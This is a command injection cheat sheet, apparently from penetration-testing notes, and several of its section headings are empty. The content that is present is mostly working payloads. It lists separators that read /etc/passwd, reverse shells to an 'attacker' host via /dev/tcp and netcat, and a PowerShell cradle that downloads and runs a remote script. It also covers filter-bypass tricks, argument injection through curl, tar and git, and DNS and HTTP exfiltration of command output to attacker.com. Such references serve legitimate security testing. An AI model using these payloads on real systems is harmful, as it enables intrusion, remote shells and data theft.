Command Injection¶
TL;DR¶
Execute OS commands through application inputs.
Detection¶
Basic Payloads¶
Time-Based¶
DNS-Based (OOB)¶
Exploitation¶
Unix/Linux¶
# Read files
; cat /etc/passwd
| cat /etc/passwd
`cat /etc/passwd`
# Reverse shell
; bash -i >& /dev/tcp/attacker/4444 0>&1
; nc attacker 4444 -e /bin/bash
Windows¶
& whoami
&& whoami
| whoami
& powershell -nop -c "IEX(New-Object Net.WebClient).downloadString('http://attacker/shell.ps1')"
Filter Bypasses¶
Space Bypass¶
Slash Bypass¶
Keyword Bypass¶
# Concatenation
who'a'mi
who"a"mi
w\h\o\a\m\i
# Variable expansion
w$()hoami
who$@ami
# Wildcards
/???/??t /???/p??s??
cat /et*/pas*
Newline Injection¶
Command Separators¶
; # Semicolon
%0a # Newline
& # Background
| # Pipe
&& # AND
|| # OR
%26 # URL-encoded &
%7c # URL-encoded |
Context-Specific¶
Node.js child_process¶
// exec() - vulnerable (uses shell)
exec(`command ${userInput}`);
// Exploit: userInput = "; id"
// execFile() - argument injection
execFile('command', ['--arg=' + userInput]);
PHP system/exec¶
Python os.system¶
Ruby open()¶
Argument Injection¶
When special chars are escaped but input becomes argument:
--help
-o /tmp/output
--config http://attacker.com/config
# Examples
curl: -o /tmp/x (write file)
tar: --use-compress-program=id
git: --upload-pack=touch${IFS}pwned
Prevention: Use -- to end options
DNS/HTTP Exfiltration¶
# DNS
; nslookup `whoami`.attacker.com
$(ping -c1 `id | base64`.attacker.com)
# HTTP
; curl http://attacker.com/?data=`id | base64`
; wget http://attacker.com/$(whoami)
Common Parameters¶
?cmd=, ?exec=, ?command=, ?execute=
?ping=, ?query=, ?code=, ?func=
?load=, ?process=, ?run=, ?payload=
Tools¶
Real Examples¶
- HackerOne #690010: Node.js exec() injection
- HackerOne #1776476: Apache Airflow Bash RCE
- HackerOne #183458: UniFi firmware download command injection